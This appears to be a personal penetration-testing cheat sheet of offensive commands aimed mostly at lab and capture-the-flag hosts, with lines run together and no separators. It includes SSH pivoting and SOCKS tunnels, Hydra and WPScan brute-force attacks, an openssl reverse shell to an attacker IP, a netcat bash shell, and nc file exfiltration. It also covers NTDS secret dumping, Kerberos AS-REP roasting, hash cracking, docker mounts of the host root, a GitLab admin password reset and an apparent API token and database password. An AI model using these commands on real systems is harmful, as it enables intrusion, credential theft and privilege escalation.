__import__('os').system('ls')
python -m pyftpdlib -p 21
# SSH local port forward to reach an_internal_server_ip:port via server_ip
ssh tunneler@server_ip -p 2222 -L 1234:an_internal_server_ip:80
# Now curl localhost:1234 will fetch an_internal_server_ip:80 which is reachable from server_ip only
# dynamic port forward to create a SOCKS proxy to visit any_internal_server_ip
ssh tunneler@server_ip -p 2222 -D 1080
# next config proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/; which is reachable from server_ip only
# ProxyJump ssh to an_internal_host via ssh server_ip
ssh -J tunneler@server_ip:2222 whistler@an_internal_host # which is only accessible from server_ip
# SSH remote port forward to send traffic back to our local port from a port of server_ip
ssh whistler@server_ip -p 2222 -L 58671:localhost:1234 #
# this will listen on port 58671 of server_ip and tunnel the traffic back to us on loclahost:1234; nc -nlvp 1234 to receive for example
# Chain ProxyJump + dynamic port forward to create a proxy of 2nd_box which is only accessible via 1st_box
ssh -j firstuser@1st_box:2222 seconduser@2nd_box -D 1080
# next config proxychains socks4a localhost 1080; proxychains curl http://any_internal_server_ip/; which is reachable from 2nd_box only
# bypass first time prompt when have non-interactive shell
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" ...
ssh -f -N -R 8000:10.3.3.14:80 -R 4443:10.3.3.14:443 -R 33306:10.3.3.14:3306 -R 33389:10.3.3.14:3389 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i key kali@192.168.19.57
# kill with
ps -C ssh
kill -9 <pid>openssl req -newkey rsa:2048 -nodes -keyout my_cert.key -x509 -days 36
2 -out my_cert.crt
# convert to .pem if needed:
openssl pkcs12 -export -in my_cert.crt -inkey my_cert.key -out my_cert.p12
openssl pkcs12 -in my_cert.p12 -nodes -out my_cert.pemsearchsploit -www query # show exploitdb link instead
searchsploit -x /path/to/exploit # read the exploit file
searchsploit -m /path/to/exploit # mirror exploit file to current directoryhydra -l admin -P ~/git/SecLists/Passwords/Leaked-Databases/rockyou-50.txt 10.10.10.75 http-post-form "/blog/admin.php:username=^USER^&password=^PASS^:Incorrect username"
hydra -l admin -P ~/git/SecLists/Passwords/Common-Credentials/10k-most-common.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password" -t 64 # 64 threads
# change to https-web-form for port 443hydra -l username -P wordlist.txt ssh <Target-IP> -s 22222ldd --versiongcc -m32 -D_GNU_SOURCE -o suid32 suid.c# start listening for download
nc -nlvp 9001 > dump.txt
# start uploading from target box
nc ip port < file.txt
fcrackzip -D -p /usr/share/wordlists/rockyou.txt myplace.zip zip2john myfile.zip > johnkey
john johnkey --wordlist=/usr/share/wordlists/rockyou.txtfor x in $(echo 22 23 24);do nmap -PN --host-timeout 201 --max-retries 0 -r -p$x 192.168.0.106;donegobuster dir -u http://10.10.10.55:8080 -a 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3831.6 Safari/537.36' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k -o gobuster/http-dlist-lower-small.txt7z l filename.vhd# --hl=2 is hide responses that has 2 lines.
wfuzz -c --hl=2 -z range,1-65535 http://10.10.10.55:60000/url.php?path=http://localhost:FUZZimpacket-secretsdump -ntds ntds.dit -system SYSTEM.bin LOCAL
# tip: users ending with $ are system accounts and has hard passwords, look for other oneswpscan --url http://10.10.10.88/webservices/wp/ --enumerate ap --plugins-detection aggressive --force --api-token o3Oj8OysJNmHbVf5PoEMe6ASLUrac3Q5KJB8G0aguz4wpscan --usernames tom -P /usr/share/wordlists/rockyou.txt --force --password-attack wp-login --url http://192.168.137.131/prehistoricforest/ --no-updateopenssl req -x509 -new -nodes -key ca.key -sha256 -days 1024 -out rh.pem
openssl pkcs12 -export -in rh.pem -inkey ca.key -out rh.p12mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/sopenssl passwd -1 -salt rh0x01 password123for user in $(cat users.txt); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; donejohn --format:krb5asrep alfresco.kerb --wordlist=/usr/share/wordlists/rockyou.txtcrunch 13 13 -t bev,%%@@^1995 -o wordlist.txt
# 13 13 - min max length
# bev - start's with
# @ will insert lower case characters
# , will insert upper case characters
# % will insert numbers
# ^ will insert symbolsmount -t nfs -o vers=3 10.1.1.1:/home/ ~/home
mount -t nfs4 -o proto=tcp,port=2049 127.0.0.1:/srv/Share mountpointsudo mount -t cifs //10.1.1.1/'sharename' /home -o rw,vers=1.0,dir_mode=0777,file_mode=0777,nounix
# or
sudo mount -t cifs -o vers=1.0 //10.11.1.136/'Sharename' sharemountxfreerdp /u:admin /v:ip_address +clipboardLINK - https://raw.githubusercontent.com/rayhan0x01/my-cmd-stash/master/linux_cmd.md
https://stackoverflow.com/questions/6004070/execute-shell-commands-from-program-running-in-wine
start /unix /bin/nc 192.168.49.102 22 -e /bin/bash
git checkout -- .
i686-w64-mingw32-gcc 40564.c -o priv_esc.exe -lws2_32
hashcat64 -m 400 -a 0 hash.txt wordlist.txt
Can get the mode with
hashid -m [file]
Start SSH server
opt/cert/openssl s_server -key /opt/cert/key.pem -cert /opt/cert/cert.pem -accept 4430 -HTTP
psql "sslmode=require host=192.168.245.60 dbname=postgres user=postgres password=postgres"
psql "host=192.168.245.60 dbname=postgres user=postgres password=postgres"
docker run -it -v /:/mnt postgres /bin/bash
docker run -v /:/mnt --rm -it redmine chroot /mnt sh
https://miloserdov.org/?p=5426#7 hashcat -m 400 -a 0 wp_hash /usr/share/wordlists/rockyou.txt
Activate scratchpy3
mssql-cli -U sa -P EjectFrailtyThorn425 -S 192.168.245.70,1435
https://www.tarlogic.com/en/blog/red-team-tales-0x01/
gitlab-rails console -e production
user = User.where(id: 1).first
user.password = 'password1'
user.password_confirmation = 'password1'
user.save!
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: brainfuck.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: https://brainfuck.htb
Connection: close
Referer: https://brainfuck.htb/wp-login.php?redirect_to=https%3A%2F%2Fbrainfuck.htb%2Fwp-admin%2F&reauth=1
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1
username=administrator&email=sth&action=loginGuestFacebook